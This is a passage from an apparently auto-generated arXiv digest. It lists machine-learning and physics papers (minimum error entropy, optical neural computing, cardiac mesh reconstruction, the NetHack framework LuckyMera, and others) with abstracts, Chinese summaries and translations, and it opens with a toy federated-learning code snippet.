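A toy illustration of the matching-and-exchange idea: pair the clients whose label distributions differ the most, then swap their classifier heads at an intermediate point of local training. The distributions, the L1 pairing rule, and the stand-in "classifier" matrices are illustrative assumptions, not the authors' exact procedure.

```python
import numpy as np

rng = np.random.default_rng(0)
num_clients, num_classes = 6, 10
# Each client's normalized label histogram stands in for its data distribution.
label_dist = rng.dirichlet(np.full(num_classes, 0.3), size=num_clients)

def pair_most_different(dists):
    """Greedily match clients in pairs, largest L1 distribution distance first."""
    unmatched, pairs = set(range(len(dists))), []
    while len(unmatched) > 1:
        best = max(((i, j) for i in unmatched for j in unmatched if i < j),
                   key=lambda ij: np.abs(dists[ij[0]] - dists[ij[1]]).sum())
        pairs.append(best)
        unmatched -= set(best)
    return pairs

# Stand-in "classifier heads": one weight matrix per client.
classifiers = [rng.normal(size=(num_classes, 32)) for _ in range(num_clients)]

for i, j in pair_most_different(label_dist):
    # At an intermediate moment of local training, matched clients would
    # exchange classifiers so each head is trained on the other's data.
    classifiers[i], classifiers[j] = classifiers[j], classifiers[i]
    print(f"clients {i} and {j} exchanged classifiers")
```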

Revisiting the Robustness of the Minimum Error Entropy Criterion: A Transfer Learning Case Study

  • paper_url: http://arxiv.org/abs/2307.08572
  • repo_url: https://github.com/lpsilvestrin/mee-finetune
  • paper_authors: Luis Pedro Silvestrin, Shujian Yu, Mark Hoogendoorn
  • for: 本研究旨在探讨如何在实际任务中常见的分布偏移下,使迁移学习方法取得良好性能。
  • methods: 本研究重新审视了最小误差熵(MEE)准则——一种在统计信号处理中广泛用于应对非高斯噪声的优化目标——并考察其在实际迁移学习回归任务中的可行性与实用性。
  • results: 研究发现,只需将基本迁移学习算法中的 MSE 损失替换为 MEE,即可达到与最新迁移学习算法相当的性能。
    Abstract Coping with distributional shifts is an important part of transfer learning methods in order to perform well in real-life tasks. However, most of the existing approaches in this area either focus on an ideal scenario in which the data does not contain noises or employ a complicated training paradigm or model design to deal with distributional shifts. In this paper, we revisit the robustness of the minimum error entropy (MEE) criterion, a widely used objective in statistical signal processing to deal with non-Gaussian noises, and investigate its feasibility and usefulness in real-life transfer learning regression tasks, where distributional shifts are common. Specifically, we put forward a new theoretical result showing the robustness of MEE against covariate shift. We also show that by simply replacing the mean squared error (MSE) loss with the MEE on basic transfer learning algorithms such as fine-tuning and linear probing, we can achieve competitive performance with respect to state-of-the-art transfer learning algorithms. We justify our arguments on both synthetic data and 5 real-world time-series data.
    摘要 应对分布偏移是迁移学习方法在真实任务中取得良好表现的重要环节。然而,现有方法大多要么假设数据不含噪声的理想场景,要么依赖复杂的训练范式或模型设计来处理分布偏移。本文重新审视最小误差熵(MEE)准则的鲁棒性——这是统计信号处理中广泛用于应对非高斯噪声的优化目标——并考察其在分布偏移常见的真实迁移学习回归任务中的可行性与实用性。具体而言,我们给出了一个新的理论结果,证明 MEE 对协变量偏移具有鲁棒性。我们还表明,只需在微调、线性探测等基本迁移学习算法中将均方误差(MSE)损失替换为 MEE,即可取得与最新迁移学习算法相当的性能。我们在合成数据和 5 个真实时间序列数据集上验证了上述论断。
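
For context, a common form of the MEE criterion estimates Renyi's quadratic entropy of the prediction errors with a Gaussian Parzen window and minimizes it (equivalently, maximizes the information potential). The sketch below shows that generic form as a drop-in replacement for MSE; the kernel bandwidth and exact normalization are assumptions and may differ from the paper's formulation.

```python
import torch

def mee_loss(pred, target, sigma=1.0):
    err = (pred - target).view(-1)                       # prediction errors e_i
    diff = err.unsqueeze(0) - err.unsqueeze(1)           # pairwise e_i - e_j
    info_potential = torch.exp(-diff ** 2 / (2 * sigma ** 2)).mean()
    return -torch.log(info_potential)                    # minimize error entropy

# Example: use mee_loss where one would otherwise use MSE during fine-tuning.
pred = torch.randn(64, requires_grad=True)
target = torch.randn(64) + 0.3 * torch.sign(torch.randn(64))  # non-Gaussian noise
loss = mee_loss(pred, target)
loss.backward()
print(float(loss))
```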

Deep Learning with Passive Optical Nonlinear Mapping

  • paper_url: http://arxiv.org/abs/2307.08558
  • repo_url: None
  • paper_authors: Fei Xia, Kyungduk Kim, Yaniv Eliezer, Liam Shaughnessy, Sylvain Gigan, Hui Cao
  • for: 这项研究旨在开发一种基于光学加速器的 Deep Learning 系统,以提高人工智能的性能和能效性。
  • methods: 该研究利用混响腔中的多重散射,在无需额外激光功率的情况下被动地实现光学非线性随机映射,以提升计算性能。
  • results: 研究发现,借助腔内多重散射实现的光学数据压缩并结合数字解码器,可以在极高压缩比下实现高性能的实时行人检测及其他计算任务。
    Abstract Deep learning has fundamentally transformed artificial intelligence, but the ever-increasing complexity in deep learning models calls for specialized hardware accelerators. Optical accelerators can potentially offer enhanced performance, scalability, and energy efficiency. However, achieving nonlinear mapping, a critical component of neural networks, remains challenging optically. Here, we introduce a design that leverages multiple scattering in a reverberating cavity to passively induce optical nonlinear random mapping, without the need for additional laser power. A key advantage emerging from our work is that we show we can perform optical data compression, facilitated by multiple scattering in the cavity, to efficiently compress and retain vital information while also decreasing data dimensionality. This allows rapid optical information processing and generation of low dimensional mixtures of highly nonlinear features. These are particularly useful for applications demanding high-speed analysis and responses such as in edge computing devices. Utilizing rapid optical information processing capabilities, our optical platforms could potentially offer more efficient and real-time processing solutions for a broad range of applications. We demonstrate the efficacy of our design in improving computational performance across tasks, including classification, image reconstruction, key-point detection, and object detection, all achieved through optical data compression combined with a digital decoder. Notably, we observed high performance, at an extreme compression ratio, for real-time pedestrian detection. Our findings pave the way for novel algorithms and architectural designs for optical computing.

Machine-Learning-based Colorectal Tissue Classification via Acoustic Resolution Photoacoustic Microscopy

  • paper_url: http://arxiv.org/abs/2307.08556
  • repo_url: None
  • paper_authors: Shangqing Tong, Peng Ge, Yanan Jiao, Zhaofu Ma, Ziye Li, Longhai Liu, Feng Gao, Xiaohui Du, Fei Gao
  • for: 检测肠癌的有效方法
  • methods: 使用机器学习基于ARPAM技术进行肠部细胞分类
  • results: 通过多种机器学习方法对肠部细胞进行分类,并对结果进行量化和质量分析以评估方法效果
    Abstract Colorectal cancer is a deadly disease that has become increasingly prevalent in recent years. Early detection is crucial for saving lives, but traditional diagnostic methods such as colonoscopy and biopsy have limitations. Colonoscopy cannot provide detailed information within the tissues affected by cancer, while biopsy involves tissue removal, which can be painful and invasive. In order to improve diagnostic efficiency and reduce patient suffering, we studied machine-learningbased approach for colorectal tissue classification that uses acoustic resolution photoacoustic microscopy (ARPAM). With this tool, we were able to classify benign and malignant tissue using multiple machine learning methods. Our results were analyzed both quantitatively and qualitatively to evaluate the effectiveness of our approach.
    摘要 结直肠癌是一种致命的疾病,近年来发病率不断上升。早期检测对挽救生命至关重要,但结肠镜检查和活检等传统诊断方法存在局限:结肠镜检查无法提供癌变组织内部的详细信息,而活检需要切取组织,具有疼痛和侵入性。为了提高诊断效率并减轻患者痛苦,我们研究了基于机器学习的结直肠组织分类方法,使用声学分辨率光声显微镜(ARPAM)。借助该工具,我们用多种机器学习方法对良性和恶性组织进行了分类,并对结果进行了定量与定性分析,以评估方法的有效性。

Multi-class point cloud completion networks for 3D cardiac anatomy reconstruction from cine magnetic resonance images

  • paper_url: http://arxiv.org/abs/2307.08535
  • repo_url: None
  • paper_authors: Marcel Beetz, Abhirup Banerjee, Julius Ossenberg-Engels, Vicente Grau
  • for: 这篇论文提出了一种全自动的三维心脏解剖表面重建流程,用于从电影磁共振成像(cine MRI)数据中重建多类三维心脏解剖网格。
  • methods: 该流程的核心是一种新型的多类点云补全网络(PCCN),在统一模型中同时解决三维重建任务中的稀疏性和切片错位问题,并在大规模合成数据集上进行了评估。
  • results: 研究发现,在多种切片错位程度下,PCCN 重建结果与金标准之间的 Chamfer 距离低于或接近原始图像分辨率;与基准 3D U-Net 相比,Hausdorff 距离和平均表面距离分别降低了 32% 和 24%。此外,该流程应用于 UK Biobank 研究中的 1000 名受试者时,能够重建准确且拓扑合理的双心室心脏网格,临床指标与已有文献相当。最后,研究还表明该方法对多种常见异常情况具有稳健性。
    Abstract Cine magnetic resonance imaging (MRI) is the current gold standard for the assessment of cardiac anatomy and function. However, it typically only acquires a set of two-dimensional (2D) slices of the underlying three-dimensional (3D) anatomy of the heart, thus limiting the understanding and analysis of both healthy and pathological cardiac morphology and physiology. In this paper, we propose a novel fully automatic surface reconstruction pipeline capable of reconstructing multi-class 3D cardiac anatomy meshes from raw cine MRI acquisitions. Its key component is a multi-class point cloud completion network (PCCN) capable of correcting both the sparsity and misalignment issues of the 3D reconstruction task in a unified model. We first evaluate the PCCN on a large synthetic dataset of biventricular anatomies and observe Chamfer distances between reconstructed and gold standard anatomies below or similar to the underlying image resolution for multiple levels of slice misalignment. Furthermore, we find a reduction in reconstruction error compared to a benchmark 3D U-Net by 32% and 24% in terms of Hausdorff distance and mean surface distance, respectively. We then apply the PCCN as part of our automated reconstruction pipeline to 1000 subjects from the UK Biobank study in a cross-domain transfer setting and demonstrate its ability to reconstruct accurate and topologically plausible biventricular heart meshes with clinical metrics comparable to the previous literature. Finally, we investigate the robustness of our proposed approach and observe its capacity to successfully handle multiple common outlier conditions.
    摘要 电影磁共振成像(cine MRI)是当前评估心脏解剖与功能的金标准。然而,它通常只采集心脏三维解剖结构的一组二维切片,从而限制了对健康与病变心脏形态和生理的理解与分析。在这篇论文中,我们提出一种全自动的表面重建流程,可以从原始 cine MRI 数据重建多类三维心脏解剖网格。其关键组件是一种多类点云补全网络(PCCN),能够在统一模型中同时解决三维重建任务中的稀疏与切片错位问题。我们首先在大规模的双心室解剖合成数据集上评估 PCCN,观察到在多种切片错位程度下,重建结果与金标准之间的 Chamfer 距离低于或接近图像分辨率;与基准 3D U-Net 相比,Hausdorff 距离和平均表面距离分别降低了 32% 和 24%。随后,我们将 PCCN 作为自动重建流程的一部分,以跨域迁移的设置应用于 UK Biobank 研究中的 1000 名受试者,证明其能够重建准确且拓扑合理的双心室心脏网格,临床指标与已有文献相当。最后,我们考察了所提方法的稳健性,发现其能够成功处理多种常见的异常情况。
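
Since the evaluation is reported in terms of Chamfer distance between reconstructed and gold-standard anatomies, here is one common (unsquared, symmetric) variant of that metric on point clouds; it is a generic implementation on toy data, not the paper's evaluation code.

```python
import torch

def chamfer_distance(a, b):
    """a: (N, 3), b: (M, 3). Mean nearest-neighbour distance in both directions."""
    d = torch.cdist(a, b)               # (N, M) pairwise Euclidean distances
    return d.min(dim=1).values.mean() + d.min(dim=0).values.mean()

mesh_pred = torch.rand(2048, 3)  # reconstructed surface points (toy data)
mesh_gt = torch.rand(2048, 3)    # gold-standard surface points (toy data)
print(float(chamfer_distance(mesh_pred, mesh_gt)))
```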

Nonlinear Processing with Linear Optics

  • paper_url: http://arxiv.org/abs/2307.08533
  • repo_url: None
  • paper_authors: Mustafa Yildirim, Niyazi Ulas Dinc, Ilker Oguz, Demetri Psaltis, Christophe Moser
  • for: 这个论文旨在实现多层光网络,并且解决在不使用电子组件的情况下实现多层光网络的挑战。
  • methods: 这篇论文提出了一种新的框架,利用多重散射同时实现可编程的线性和非线性变换,并且可以在低功率连续波(CW)光下实现非线性光学计算。
  • results: 理论和实验研究表明,通过多散射重复数据可以实现低功率连续波光的非线性计算。
    Abstract Deep neural networks have achieved remarkable breakthroughs by leveraging multiple layers of data processing to extract hidden representations, albeit at the cost of large electronic computing power. To enhance energy efficiency and speed, the optical implementation of neural networks aims to harness the advantages of optical bandwidth and the energy efficiency of optical interconnections. In the absence of low-power optical nonlinearities, the challenge in the implementation of multilayer optical networks lies in realizing multiple optical layers without resorting to electronic components. In this study, we present a novel framework that uses multiple scattering that is capable of synthesizing programmable linear and nonlinear transformations concurrently at low optical power by leveraging the nonlinear relationship between the scattering potential, represented by data, and the scattered field. Theoretical and experimental investigations show that repeating the data by multiple scattering enables non-linear optical computing at low power continuous wave light.
    摘要 深度神经网络通过多层数据处理提取隐藏表示取得了显著突破,但代价是巨大的电子计算开销。为了提升能效与速度,神经网络的光学实现旨在利用光学带宽和光互连的能效优势。在缺乏低功率光学非线性的情况下,实现多层光学网络的挑战在于如何不借助电子元件实现多个光学层。本研究提出了一种新框架,利用多重散射,借助散射势(由数据表示)与散射场之间的非线性关系,在低光功率下同时合成可编程的线性与非线性变换。理论与实验研究表明,通过多重散射重复输入数据,可在低功率连续波光下实现非线性光学计算。

LuckyMera: a Modular AI Framework for Building Hybrid NetHack Agents

  • paper_url: http://arxiv.org/abs/2307.08532
  • repo_url: https://github.com/pervasive-ai-lab/luckymera
  • paper_authors: Luigi Quarantiello, Simone Marzeddu, Antonio Guzzi, Vincenzo Lomonaco
  • for: 这个论文的目的是提出一个可 configurable、可扩展的 AI 框架,用于在 NetHack 游戏中测试和训练 AI 代理人。
  • methods: 这个框架同时支持符号式(symbolic)和神经网络学习方法,并提供了一些实用功能,用于保存经验轨迹并将其用于训练神经网络模块。
  • results: 经验证明,这个框架可以实现 state-of-the-art 的表现在完整的 NetHack 游戏中,并且提供了一个强大的基线代理人。
    Abstract In the last few decades we have witnessed a significant development in Artificial Intelligence (AI) thanks to the availability of a variety of testbeds, mostly based on simulated environments and video games. Among those, roguelike games offer a very good trade-off in terms of complexity of the environment and computational costs, which makes them perfectly suited to test AI agents generalization capabilities. In this work, we present LuckyMera, a flexible, modular, extensible and configurable AI framework built around NetHack, a popular terminal-based, single-player roguelike video game. This library is aimed at simplifying and speeding up the development of AI agents capable of successfully playing the game and offering a high-level interface for designing game strategies. LuckyMera comes with a set of off-the-shelf symbolic and neural modules (called "skills"): these modules can be either hard-coded behaviors, or neural Reinforcement Learning approaches, with the possibility of creating compositional hybrid solutions. Additionally, LuckyMera comes with a set of utility features to save its experiences in the form of trajectories for further analysis and to use them as datasets to train neural modules, with a direct interface to the NetHack Learning Environment and MiniHack. Through an empirical evaluation we validate our skills implementation and propose a strong baseline agent that can reach state-of-the-art performances in the complete NetHack game. LuckyMera is open-source and available at https://github.com/Pervasive-AI-Lab/LuckyMera.
    摘要 过去几十年间,得益于各种测试平台(多数基于模拟环境和电子游戏)的出现,人工智能(AI)取得了显著发展。其中,roguelike 游戏在环境复杂度与计算成本之间提供了很好的平衡,非常适合用来测试 AI 智能体的泛化能力。在这项工作中,我们介绍 LuckyMera,一个围绕 NetHack(一款流行的基于终端的单人 roguelike 游戏)构建的灵活、模块化、可扩展且可配置的 AI 框架。该库旨在简化并加速能够成功游玩该游戏的 AI 智能体的开发,并为设计游戏策略提供高层接口。LuckyMera 自带一组现成的符号式与神经网络模块(称为“技能”):这些模块既可以是硬编码的行为,也可以是基于强化学习的神经方法,还可以组合成混合解决方案。此外,LuckyMera 提供了一系列实用功能,可将经验保存为轨迹以供进一步分析,并将其作为数据集用于训练神经模块,且与 NetHack Learning Environment 和 MiniHack 有直接接口。通过实证评估,我们验证了技能实现的有效性,并提出了一个强基线智能体,其在完整的 NetHack 游戏中可以达到最先进的性能。LuckyMera 是开源的,可在 https://github.com/Pervasive-AI-Lab/LuckyMera 获取。

Synthetic Lagrangian Turbulence by Generative Diffusion Models

  • paper_url: http://arxiv.org/abs/2307.08529
  • repo_url: https://github.com/smartturb/diffusion-lagr
  • paper_authors: Tianyi Li, Luca Biferale, Fabio Bonaccorso, Martino Andrea Scarpolini, Michele Buzzicotti
  • For: The paper aims to generate single-particle trajectories in three-dimensional turbulence at high Reynolds numbers using a machine learning approach.* Methods: The paper proposes a state-of-the-art Diffusion Model to generate the trajectories, which bypasses the need for direct numerical simulations or experiments to obtain reliable Lagrangian data.* Results: The model demonstrates the ability to quantitatively reproduce all relevant statistical benchmarks over the entire range of time scales, including the presence of fat tails distribution for the velocity increments, anomalous power law, and enhancement of intermittency around the dissipative scale. The model also exhibits good generalizability for extreme events, achieving unprecedented intensity and rarity.
    Abstract Lagrangian turbulence lies at the core of numerous applied and fundamental problems related to the physics of dispersion and mixing in engineering, bio-fluids, atmosphere, oceans, and astrophysics. Despite exceptional theoretical, numerical, and experimental efforts conducted over the past thirty years, no existing models are capable of faithfully reproducing statistical and topological properties exhibited by particle trajectories in turbulence. We propose a machine learning approach, based on a state-of-the-art Diffusion Model, to generate single-particle trajectories in three-dimensional turbulence at high Reynolds numbers, thereby bypassing the need for direct numerical simulations or experiments to obtain reliable Lagrangian data. Our model demonstrates the ability to quantitatively reproduce all relevant statistical benchmarks over the entire range of time scales, including the presence of fat tails distribution for the velocity increments, anomalous power law, and enhancement of intermittency around the dissipative scale. The model exhibits good generalizability for extreme events, achieving unprecedented intensity and rarity. This paves the way for producing synthetic high-quality datasets for pre-training various downstream applications of Lagrangian turbulence.
    摘要 拉格朗日湍流是工程、生物流体、大气、海洋和天体物理中众多与弥散和混合物理相关的应用与基础问题的核心。尽管过去三十年间开展了大量出色的理论、数值和实验工作,现有模型仍无法忠实再现湍流中粒子轨迹所表现出的统计与拓扑性质。我们提出一种基于最先进扩散模型的机器学习方法,用于在高雷诺数下生成三维湍流中的单粒子轨迹,从而绕过为获得可靠拉格朗日数据而进行直接数值模拟或实验的需要。我们的模型能够在全部时间尺度范围内定量地再现所有相关统计基准,包括速度增量的厚尾分布、反常幂律标度,以及耗散尺度附近间歇性的增强。该模型对极端事件也表现出良好的泛化能力,可生成强度和稀有程度前所未有的事件。这为生成高质量合成数据集、用于预训练拉格朗日湍流的各类下游应用铺平了道路。

Multi-Domain Learning with Modulation Adapters

  • paper_url: http://arxiv.org/abs/2307.08528
  • repo_url: None
  • paper_authors: Ekaterina Iakovleva, Karteek Alahari, Jakob Verbeek
  • For: The paper is written for computer vision tasks, specifically for image classification across multiple domains.* Methods: The paper introduces Modulation Adapters, which update the convolutional filter weights of the model in a multiplicative manner for each task. The adaptation weights are parameterized in a factored manner, allowing for flexible scaling of the number of per-task parameters and different parameter-accuracy trade-offs.* Results: The approach yields excellent results on the Visual Decathlon challenge and the ImageNet-to-Sketch benchmark, with accuracies that are comparable to or better than those of existing state-of-the-art approaches.
    Abstract Deep convolutional networks are ubiquitous in computer vision, due to their excellent performance across different tasks for various domains. Models are, however, often trained in isolation for each task, failing to exploit relatedness between tasks and domains to learn more compact models that generalise better in low-data regimes. Multi-domain learning aims to handle related tasks, such as image classification across multiple domains, simultaneously. Previous work on this problem explored the use of a pre-trained and fixed domain-agnostic base network, in combination with smaller learnable domain-specific adaptation modules. In this paper, we introduce Modulation Adapters, which update the convolutional filter weights of the model in a multiplicative manner for each task. Parameterising these adaptation weights in a factored manner allows us to scale the number of per-task parameters in a flexible manner, and to strike different parameter-accuracy trade-offs. We evaluate our approach on the Visual Decathlon challenge, composed of ten image classification tasks across different domains, and on the ImageNet-to-Sketch benchmark, which consists of six image classification tasks. Our approach yields excellent results, with accuracies that are comparable to or better than those of existing state-of-the-art approaches.
    摘要 深度卷积网络因其在不同领域各类任务上的出色表现而在计算机视觉中无处不在。然而,模型往往针对每个任务单独训练,未能利用任务与领域之间的相关性来学习更紧凑、在低数据情形下泛化更好的模型。多领域学习旨在同时处理相关任务,例如跨多个领域的图像分类。此前的工作探索了使用预训练且固定的领域无关基础网络,并结合较小的可学习领域特定适配模块。本文提出调制适配器(Modulation Adapters),以乘法方式针对每个任务更新模型的卷积滤波器权重。通过以因子分解的方式参数化这些适配权重,我们可以灵活地调整每个任务的参数量,并在参数量与精度之间取得不同的折中。我们在由十个跨领域图像分类任务组成的 Visual Decathlon 挑战以及包含六个图像分类任务的 ImageNet-to-Sketch 基准上评估了该方法,取得了与现有最先进方法相当或更好的精度。
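
To make the "multiplicative, factored per-task update of convolutional filter weights" concrete, here is a minimal sketch of one way such a modulation adapter could look. The factorization shape, rank, and initialization are my own illustrative assumptions, not the paper's exact design.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class ModulatedConv2d(nn.Module):
    def __init__(self, in_ch, out_ch, k, num_tasks, rank=4):
        super().__init__()
        self.base = nn.Conv2d(in_ch, out_ch, k, padding=k // 2)  # shared weights
        # Per-task factored modulation: (out_ch x rank) @ (rank x in_ch),
        # initialized so the product is all ones (identity modulation).
        self.u = nn.Parameter(torch.ones(num_tasks, out_ch, rank) / rank)
        self.v = nn.Parameter(torch.ones(num_tasks, rank, in_ch))

    def forward(self, x, task):
        mod = (self.u[task] @ self.v[task])[:, :, None, None]   # (out_ch, in_ch, 1, 1)
        weight = self.base.weight * mod                          # multiplicative update
        return F.conv2d(x, weight, self.base.bias, padding=self.base.padding)

layer = ModulatedConv2d(in_ch=16, out_ch=32, k=3, num_tasks=5)
y = layer(torch.randn(2, 16, 24, 24), task=3)  # task-specific forward pass
print(y.shape)
```

The rank of the factorization controls the number of per-task parameters, which is how such a scheme can trade parameters against accuracy.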

Image Captions are Natural Prompts for Text-to-Image Models

  • paper_url: http://arxiv.org/abs/2307.08526
  • repo_url: None
  • paper_authors: Shiye Lei, Hao Chen, Sen Zhang, Bo Zhao, Dacheng Tao
  • for: 提高文本到图像生成模型的训练数据 Informative 性和多样性
  • methods: 使用高级captioning模型生成图像描述,并将描述与分类名称 concatenate 用作生成模型的训练数据
  • results: 在 ImageNette、ImageNet-100 和 ImageNet-1K 上进行了广泛的实验,验证了我们的方法可以显著提高基于合成训练数据训练的模型的性能,平均分类精度提升 10%。
    Abstract With the rapid development of Artificial Intelligence Generated Content (AIGC), it has become common practice in many learning tasks to train or fine-tune large models on synthetic data due to the data-scarcity and privacy leakage problems. Albeit promising with unlimited data generation, owing to massive and diverse information conveyed in real images, it is challenging for text-to-image generative models to synthesize informative training data with hand-crafted prompts, which usually leads to inferior generalization performance when training downstream models. In this paper, we theoretically analyze the relationship between the training effect of synthetic data and the synthetic data distribution induced by prompts. Then we correspondingly propose a simple yet effective method that prompts text-to-image generative models to synthesize more informative and diverse training data. Specifically, we caption each real image with the advanced captioning model to obtain informative and faithful prompts that extract class-relevant information and clarify the polysemy of class names. The image captions and class names are concatenated to prompt generative models for training image synthesis. Extensive experiments on ImageNette, ImageNet-100, and ImageNet-1K verify that our method significantly improves the performance of models trained on synthetic training data, i.e., 10% classification accuracy improvements on average.
    摘要 随着人工智能生成内容(AIGC)的快速发展,在许多学习任务中通常是通过人工生成的数据进行训练或细化大型模型,因为实际数据的缺乏和隐私泄露问题。虽然人工生成的数据具有无限数据的优势,但是由于实际图像中含有庞大和多样化的信息, Text-to-image生成模型很难以通过手工提示生成有用的训练数据,这通常会导致下游模型训练时的泛化性能差。在这篇论文中,我们 theoretically 分析了人工生成数据训练效果和提示数据分布之间的关系,然后对应提出了一种简单 yet effective的方法。具体来说,我们使用高级描述模型将每个实际图像描述为 faithful 和有用的提示,以提取类别相关的信息并减少类名的多义性。图像描述和类别名称 concatenated 作为提示生成模型进行训练图像生成。我们在 ImageNette、ImageNet-100 和 ImageNet-1K 进行了广泛的实验,结果显示,我们的方法可以在使用人工生成数据进行训练时提高模型的性能,即平均提高10%的分类精度。
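
The mechanism itself is a simple pipeline: caption each real image, concatenate the class name with the caption, and use that as the prompt for the text-to-image generator. The sketch below only shows that prompt-construction step; the captioner, generator, and prompt template are placeholders, not the paper's exact components.

```python
# Sketch of the prompt-construction step for caption-based synthetic data.
def build_prompt(class_name, caption):
    # The class name clarifies polysemy; the caption adds class-relevant detail.
    return f"{class_name}, {caption}"

def synthesize_training_set(images, class_names, captioner, generator, per_image=1):
    synthetic = []
    for img, cls in zip(images, class_names):
        caption = captioner(img)                        # e.g. an advanced captioning model
        prompt = build_prompt(cls, caption)
        for _ in range(per_image):
            synthetic.append((generator(prompt), cls))  # (synthetic image, label)
    return synthetic

# Toy stand-ins so the sketch runs end to end without any model downloads.
fake_captioner = lambda img: "a small dog running on grass"
fake_generator = lambda prompt: f"<image generated from: {prompt}>"
data = synthesize_training_set(["img0"], ["English springer"], fake_captioner, fake_generator)
print(data[0])
```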

Results on Counterfactual Invariance

  • paper_url: http://arxiv.org/abs/2307.08519
  • repo_url: None
  • paper_authors: Jake Fawkes, Robin J. Evans
  • for: 本文旨在为反事实不变性(counterfactual invariance)提供理论分析。
  • methods: 文章梳理了多种现有定义,研究了它们之间的关系及其在因果图上的含义。
  • results: 文章表明,反事实不变性蕴含条件独立性,但条件独立性并不能说明满足反事实不变性的程度或可能性;此外,对于离散因果模型,反事实不变的函数通常被限制为仅依赖特定变量的函数,甚至是常数函数。
    Abstract In this paper we provide a theoretical analysis of counterfactual invariance. We present a variety of existing definitions, study how they relate to each other and what their graphical implications are. We then turn to the current major question surrounding counterfactual invariance, how does it relate to conditional independence? We show that whilst counterfactual invariance implies conditional independence, conditional independence does not give any implications about the degree or likelihood of satisfying counterfactual invariance. Furthermore, we show that for discrete causal models counterfactually invariant functions are often constrained to be functions of particular variables, or even constant.
    摘要 本文对反事实不变性(counterfactual invariance)进行了理论分析。我们给出了多种现有定义,研究了它们之间的关系及其在因果图上的含义。随后,我们讨论当前围绕反事实不变性的核心问题:它与条件独立性之间的关系。我们表明,反事实不变性蕴含条件独立性,但条件独立性并不能提供关于满足反事实不变性的程度或可能性的任何信息。此外,我们还表明,对于离散因果模型,反事实不变的函数通常被限制为仅依赖特定变量的函数,甚至是常数函数。
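
As a schematic restatement of the direction of implication discussed above (the notation is ours, X(a) denotes the counterfactual input under A = a, and the exact conditioning set W depends on the assumed causal graph, so this should be read as a sketch rather than the paper's precise theorem):

```latex
% Schematic only: counterfactual invariance of f implies a conditional
% independence, while the converse gives no such guarantee.
f\big(X(a)\big) \overset{a.s.}{=} f\big(X(a')\big)\ \ \forall a, a'
\quad\Longrightarrow\quad
f(X) \perp\!\!\!\perp A \mid W,
\qquad\text{but } f(X) \perp\!\!\!\perp A \mid W \text{ does not imply counterfactual invariance.}
```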

Kernel-Based Testing for Single-Cell Differential Analysis

  • paper_url: http://arxiv.org/abs/2307.08509
  • repo_url: https://github.com/anthoozier/kernel_testsda
  • paper_authors: Anthony Ozier-Lafontaine, Camille Fourneaux, Ghislain Durif, Céline Vallot, Olivier Gandrillon, Sandrine Giraud, Bertrand Michel, Franck Picard
  • for: 这种方法用于比较单个细胞中分子特征的分布, 例如基因表达和epigenomic修饰。
  • methods: 该方法基于核嵌入(kernel embedding)的非线性比较框架,既可以对单细胞特征逐一进行分析,也可以在考虑复杂依赖关系的情况下对整个转录组或表观基因组进行全局比较。
  • results: 该方法能够揭示细胞群体中原本难以察觉的异质性,成功识别处于还原与分化过渡阶段的细胞;此外,通过分析单细胞 ChIP-Seq 数据,该方法还发现了一类未经治疗的乳腺癌细胞亚群,其表观基因组特征与持留细胞(persister cells)相似。
    Abstract Single-cell technologies have provided valuable insights into the distribution of molecular features, such as gene expression and epigenomic modifications. However, comparing these complex distributions in a controlled and powerful manner poses methodological challenges. Here we propose to benefit from the kernel-testing framework to compare the complex cell-wise distributions of molecular features in a non-linear manner based on their kernel embedding. Our framework not only allows for feature-wise analyses but also enables global comparisons of transcriptomes or epigenomes, considering their intricate dependencies. By using a classifier to discriminate cells based on the variability of their embedding, our method uncovers heterogeneities in cell populations that would otherwise go undetected. We show that kernel testing overcomes the limitations of differential analysis methods dedicated to single-cell. Kernel testing is applied to investigate the reversion process of differentiating cells, successfully identifying cells in transition between reversion and differentiation stages. Additionally, we analyze single-cell ChIP-Seq data and identify a subpopulation of untreated breast cancer cells that exhibit an epigenomic profile similar to persister cells.
    摘要 单细胞技术为基因表达和表观基因组修饰等分子特征的分布提供了宝贵的洞见。然而,以受控且有统计效力的方式比较这些复杂分布存在方法学上的挑战。我们提议利用核检验(kernel testing)框架,基于核嵌入以非线性方式比较各细胞层面分子特征的复杂分布。该框架不仅支持逐特征分析,还能在考虑复杂依赖关系的情况下对转录组或表观基因组进行全局比较。通过使用分类器根据细胞嵌入的变异性对细胞进行判别,我们的方法能够揭示细胞群体中原本难以察觉的异质性。我们证明核检验克服了专门针对单细胞的差异分析方法的局限。将核检验应用于研究分化细胞的还原过程,成功识别出处于还原与分化过渡阶段的细胞。此外,我们分析了单细胞 ChIP-Seq 数据,发现了一类未经治疗的乳腺癌细胞亚群,其表观基因组特征与持留细胞相似。
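
A standard ingredient of kernel-based two-sample testing is the maximum mean discrepancy (MMD) between kernel embeddings of the two groups. The sketch below computes a generic (biased) MMD² with a Gaussian kernel and a permutation p-value on synthetic "cells"; the paper's actual statistic, kernel choices, and calibration may differ.

```python
import numpy as np

def gaussian_kernel(x, y, sigma=1.0):
    d2 = ((x[:, None, :] - y[None, :, :]) ** 2).sum(-1)
    return np.exp(-d2 / (2 * sigma ** 2))

def mmd2(x, y, sigma=1.0):
    return (gaussian_kernel(x, x, sigma).mean()
            + gaussian_kernel(y, y, sigma).mean()
            - 2 * gaussian_kernel(x, y, sigma).mean())

rng = np.random.default_rng(1)
cells_a = rng.normal(0.0, 1.0, size=(100, 20))   # e.g. feature profiles, group A
cells_b = rng.normal(0.3, 1.0, size=(100, 20))   # group B, slightly shifted
obs = mmd2(cells_a, cells_b)

# Permutation p-value: reshuffle group labels and recompute the statistic.
pooled = np.vstack([cells_a, cells_b])
null = [mmd2(*np.split(rng.permutation(pooled), 2)) for _ in range(200)]
p_val = (np.sum(np.array(null) >= obs) + 1) / 201
print(f"MMD^2 = {obs:.4f}, permutation p-value = {p_val:.3f}")
```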

Efficient and Accurate Optimal Transport with Mirror Descent and Conjugate Gradients

  • paper_url: http://arxiv.org/abs/2307.08507
  • repo_url: https://github.com/adaptive-agents-lab/mdot-pncg
  • paper_authors: Mete Kemertas, Allan D. Jepson, Amir-massoud Farahmand
  • for: 本文提出了一种新的最优传输算法,借鉴了熵正则化最优传输、镜像下降和共轭梯度等文献中的思想。
  • methods: 该算法可以以任意精度计算最优传输代价,而不会遇到数值稳定性问题;它在 GPU 上高效实现,并且在许多情况下(无论是迭代次数还是运行时间)都比 Sinkhorn 算法等传统算法收敛更快。
